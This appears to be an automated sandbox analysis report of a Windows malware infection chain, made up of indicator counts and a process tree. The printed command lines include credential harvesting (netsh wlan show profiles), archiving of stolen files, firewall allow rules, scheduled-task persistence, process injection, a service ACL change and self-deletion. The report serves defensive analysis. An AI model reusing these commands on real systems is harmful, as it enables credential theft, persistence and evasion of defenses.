description pid Process Token: SeDebugPrivilege 2220 Traffic.exe Token: SeBackupPrivilege 2220 Traffic.exe Token: SeSecurityPrivilege 2220 Traffic.exe Token: SeSecurityPrivilege 2220 Traffic.exe Token: SeSecurityPrivilege 2220 Traffic.exe Token: SeSecurityPrivilege 2220 Traffic.exe Token: SeDebugPrivilege 2420 32456.exe Token: SeDebugPrivilege 3556 propro.exe Token: SeBackupPrivilege 2420 32456.exe Token: SeSecurityPrivilege 2420 32456.exe Token: SeSecurityPrivilege 2420 32456.exe Token: SeSecurityPrivilege 2420 32456.exe Token: SeSecurityPrivilege 2420 32456.exe Token: SeDebugPrivilege 1816 Uni400uni.exe Token: SeDebugPrivilege 1528 CasPol.exe Token: SeDebugPrivilege 2064 RegAsm.exe Token: SeDebugPrivilege 2920 redlinepanel.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeDebugPrivilege 3792 RegAsm.exe Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 420 powershell.exe Token: SeDebugPrivilege 3348 zJKj9XrRYEzM0tjHDXgtwLkI.exe Token: SeImpersonatePrivilege 3348 zJKj9XrRYEzM0tjHDXgtwLkI.exe Token: SeDebugPrivilege 1908 RS7VMIrsQWdNPWVAW9XF7KXz.exe Token: SeImpersonatePrivilege 1908 RS7VMIrsQWdNPWVAW9XF7KXz.exe Token: SeDebugPrivilege 1504 P9SgmBKE6sh3sHzqGHlgHRIR.exe Token: SeImpersonatePrivilege 1504 P9SgmBKE6sh3sHzqGHlgHRIR.exe Token: SeDebugPrivilege 6048 powershell.exe Token: SeDebugPrivilege 6020 powershell.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 1748 amadka.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe 3196 u1vk.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2996 wrote to memory of 3528 2996 explorgu.exe 79 PID 2996 wrote to memory of 3528 2996 explorgu.exe 79 PID 2996 wrote to memory of 3528 2996 explorgu.exe 79 PID 2996 wrote to memory of 2124 2996 explorgu.exe 80 PID 2996 wrote to memory of 2124 2996 explorgu.exe 80 PID 2996 wrote to memory of 2124 2996 explorgu.exe 80 PID 2124 wrote to memory of 3976 2124 alex1234.exe 82 PID 2124 wrote to memory of 3976 2124 alex1234.exe 82 PID 2124 wrote to memory of 3976 2124 alex1234.exe 82 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2124 wrote to memory of 2064 2124 alex1234.exe 83 PID 2064 wrote to memory of 3556 2064 RegAsm.exe 84 PID 2064 wrote to memory of 3556 2064 RegAsm.exe 84 PID 2064 wrote to memory of 3556 2064 RegAsm.exe 84 PID 2064 wrote to memory of 2220 2064 RegAsm.exe 85 PID 2064 wrote to memory of 2220 2064 RegAsm.exe 85 PID 2996 wrote to memory of 1748 2996 explorgu.exe 88 PID 2996 wrote to memory of 1748 2996 explorgu.exe 88 PID 2996 wrote to memory of 1748 2996 explorgu.exe 88 PID 2996 wrote to memory of 2920 2996 explorgu.exe 90 PID 2996 wrote to memory of 2920 2996 explorgu.exe 90 PID 2996 wrote to memory of 2920 2996 explorgu.exe 90 PID 1748 wrote to memory of 4936 1748 amadka.exe 91 PID 1748 wrote to memory of 4936 1748 amadka.exe 91 PID 1748 wrote to memory of 4936 1748 amadka.exe 91 PID 2996 wrote to memory of 2420 2996 explorgu.exe 92 PID 2996 wrote to memory of 2420 2996 explorgu.exe 92 PID 2996 wrote to memory of 1600 2996 explorgu.exe 94 PID 2996 wrote to memory of 1600 2996 explorgu.exe 94 PID 2996 wrote to memory of 1600 2996 explorgu.exe 94 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 1600 wrote to memory of 3792 1600 goldprimeldlldf.exe 96 PID 2996 wrote to memory of 2632 2996 explorgu.exe 97 PID 2996 wrote to memory of 2632 2996 explorgu.exe 97 PID 2996 wrote to memory of 2632 2996 explorgu.exe 97 PID 2632 wrote to memory of 4908 2632 NewB.exe 98 PID 2632 wrote to memory of 4908 2632 NewB.exe 98 PID 2632 wrote to memory of 4908 2632 NewB.exe 98 PID 2996 wrote to memory of 572 2996 explorgu.exe 101 PID 2996 wrote to memory of 572 2996 explorgu.exe 101 PID 2996 wrote to memory of 572 2996 explorgu.exe 101 PID 2632 wrote to memory of 1816 2632 NewB.exe 103 PID 2632 wrote to memory of 1816 2632 NewB.exe 103 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106 PID 572 wrote to memory of 3088 572 swiiiii.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe"C:\Users\Admin\AppData\Local\Temp\9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:3880
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:1508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4936 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Loads dropped DLL
PID:1744 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4152 -
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe"C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"4⤵PID:236
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Users\Admin\Pictures\p6u0u9NsFSyRSr6UUKCgAYxB.exe"C:\Users\Admin\Pictures\p6u0u9NsFSyRSr6UUKCgAYxB.exe"5⤵
- Executes dropped EXE
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\u1vk.0.exe"C:\Users\Admin\AppData\Local\Temp\u1vk.0.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1688 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe"7⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe"C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe"8⤵PID:4640
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\EBAFBGIDHC.exe9⤵PID:564
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 300010⤵
- Runs ping.exe
PID:6024
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 34287⤵
- Program crash
PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1vk.1.exe"C:\Users\Admin\AppData\Local\Temp\u1vk.1.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD17⤵PID:4792
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 15126⤵
- Program crash
PID:4908
-
-
-
C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"C:\Users\Admin\Pictures\RS7VMIrsQWdNPWVAW9XF7KXz.exe"6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5304
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4232
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:2884
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:6064
-
-
-
-
C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"C:\Users\Admin\Pictures\zJKj9XrRYEzM0tjHDXgtwLkI.exe"6⤵
- Executes dropped EXE
PID:5764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5284
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:5552
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:2812
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵PID:1928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5808
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5552
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:1424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:6080
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:5032
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5148
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:5808
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:1468
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:5160
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"C:\Users\Admin\Pictures\P9SgmBKE6sh3sHzqGHlgHRIR.exe"6⤵
- Executes dropped EXE
PID:5956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5444
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:1600
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:6056
-
-
-
-
C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe"C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe" --silent --allusers=05⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:1708 -
C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exeC:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6b83e1d0,0x6b83e1dc,0x6b83e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GDouWbq38shiSdxpGPfHUTkD.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GDouWbq38shiSdxpGPfHUTkD.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4208
-
-
C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe"C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1708 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240331135733" --session-guid=251e7301-27ee-4f20-b210-7ab6ee4a210c --server-tracking-blob=MzNhNmVmMzA1ZjY0YTE1YTgxZGNiYTkxNmE2OGYwMzk1N2M3NTZmZTFkNTgzZGUyMDczMGUwMDNmMjMxYjAwMTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N18xMjMiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE4OTM0NDguNjkxOCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N18xMjMiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjJlMzllYWViLWZlMjMtNGI2My04OGI2LTg2MTU3MDEzMWI0YiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=98050000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4224 -
C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exeC:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6aebe1d0,0x6aebe1dc,0x6aebe1e87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"6⤵PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe" --version6⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x5c0040,0x5c004c,0x5c00587⤵PID:5664
-
-
-
-
C:\Users\Admin\Pictures\nFx0jXvqtWhfmyYa87QxI4QU.exe"C:\Users\Admin\Pictures\nFx0jXvqtWhfmyYa87QxI4QU.exe"5⤵PID:5928
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:4616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 8963⤵
- Program crash
PID:5028
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵PID:3808
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵PID:6080
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal4⤵PID:6116
-
-
-
-
